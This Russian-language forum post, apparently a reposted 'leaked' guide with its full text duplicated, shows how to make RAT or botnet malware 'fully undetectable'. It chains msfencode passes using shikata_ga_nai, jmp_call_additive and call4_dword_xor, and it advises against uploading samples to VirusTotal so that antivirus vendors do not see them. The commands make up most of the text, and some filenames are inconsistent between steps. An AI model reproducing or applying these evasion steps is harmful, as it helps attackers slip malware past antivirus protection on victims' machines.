Слито
Сам еще не проверял, времени нет.
От себя лишь добавлю что на virustotal ничего не лейте, есть много других сервисов
[POSTS=20][DAYS=30]
Что нам необходимо:
1. Backtrack ОС
2. MSF encoders
Итак, наш первый шаг - создать вирусный файл с помощью любого из таких
инструментов, как RAT, бот-нет, или что-то еще. Чтобы сделать это FUD (Fully
Undetectable), мы используем backtrack. Прежде чем отправляться в FUD,
проверьте файл на virustotal.com, и мы получим коэффициент обнаружения,
например, скажем, 30/44
Теперь запустите терминал в Backtrack и перейдите в каталог, в котором
находится ваш файл.
E.g. cd Desktop
Итак, наш первый шаг - изменить разрешения этого файла (775), введя эту
команду:
root@bt:~/Desktop# chmod 775 stub.exe
Далее введите эту команду для кодирования вашего вируса:
root@bt:~/Desktop# msfencode -i /root/Desktop/Server.exe -t raw -o
/root/Desktop/stub2.exe -e x86/shikata_ga_nai -c 10
Вы заметите, что Антивирус все еще обнаружил это, хотя мы закодировали
его 10 раз с “x86/shikata_ga_nai” encoder.
Теперь снова измените разрешения этого выходного файла,
root@bt:~/Desktop# chmod 775 server2.exe
Теперь, 2-й раз, мы используем другой кодировщик с именем
«jmp_call_additive»
root@bt:~/Desktop# msfencode -i /root/Desktop/Server2.exe -t raw -o
/root/Desktop/Server3.exe -e x86/jmp_call_additive -c 1
Теперь снова измените разрешения этого выходного файла,
root@bt:~/Desktop# chmod 775 server3.exe
Теперь снова мы используем другой кодировщик, названный так:
“call4_dword_xor”
root@bt:~/Desktop# msfencode -i /root/Desktop/Server3.exe -t raw -o
/root/Desktop/Server4.exe -e x86/call4_dword_xor -c 1
Теперь снова измените разрешения этого выходного файла,
root@bt:~/Desktop# chmod 775 server4.exe
Теперь мы окончательно кодируем этот кодировщик “shikata_ga_nai”
root@bt:~/Desktop# msfencode -i /root/Desktop/Server4.exe -o
/root/Desktop/final.exe -e x86/shikata_ga_nai -c 1
Теперь снова измените разрешения этого выходного файла,
root@bt:~/Desktop# chmod 775 final.exe
Теперь вы получите файл final.exe, загрузите его на virustotal.com, и вы
увидите результаты.
[/DAYS][/POSTS]
Сам еще не проверял, времени нет.
От себя лишь добавлю что на virustotal ничего не лейте, есть много других сервисов
[POSTS=20][DAYS=30]
Что нам необходимо:
1. Backtrack ОС
2. MSF encoders
Итак, наш первый шаг - создать вирусный файл с помощью любого из таких
инструментов, как RAT, бот-нет, или что-то еще. Чтобы сделать это FUD (Fully
Undetectable), мы используем backtrack. Прежде чем отправляться в FUD,
проверьте файл на virustotal.com, и мы получим коэффициент обнаружения,
например, скажем, 30/44
Теперь запустите терминал в Backtrack и перейдите в каталог, в котором
находится ваш файл.
E.g. cd Desktop
Итак, наш первый шаг - изменить разрешения этого файла (775), введя эту
команду:
root@bt:~/Desktop# chmod 775 stub.exe
Далее введите эту команду для кодирования вашего вируса:
root@bt:~/Desktop# msfencode -i /root/Desktop/Server.exe -t raw -o
/root/Desktop/stub2.exe -e x86/shikata_ga_nai -c 10
Вы заметите, что Антивирус все еще обнаружил это, хотя мы закодировали
его 10 раз с “x86/shikata_ga_nai” encoder.
Теперь снова измените разрешения этого выходного файла,
root@bt:~/Desktop# chmod 775 server2.exe
Теперь, 2-й раз, мы используем другой кодировщик с именем
«jmp_call_additive»
root@bt:~/Desktop# msfencode -i /root/Desktop/Server2.exe -t raw -o
/root/Desktop/Server3.exe -e x86/jmp_call_additive -c 1
Теперь снова измените разрешения этого выходного файла,
root@bt:~/Desktop# chmod 775 server3.exe
Теперь снова мы используем другой кодировщик, названный так:
“call4_dword_xor”
root@bt:~/Desktop# msfencode -i /root/Desktop/Server3.exe -t raw -o
/root/Desktop/Server4.exe -e x86/call4_dword_xor -c 1
Теперь снова измените разрешения этого выходного файла,
root@bt:~/Desktop# chmod 775 server4.exe
Теперь мы окончательно кодируем этот кодировщик “shikata_ga_nai”
root@bt:~/Desktop# msfencode -i /root/Desktop/Server4.exe -o
/root/Desktop/final.exe -e x86/shikata_ga_nai -c 1
Теперь снова измените разрешения этого выходного файла,
root@bt:~/Desktop# chmod 775 final.exe
Теперь вы получите файл final.exe, загрузите его на virustotal.com, и вы
увидите результаты.
[/DAYS][/POSTS]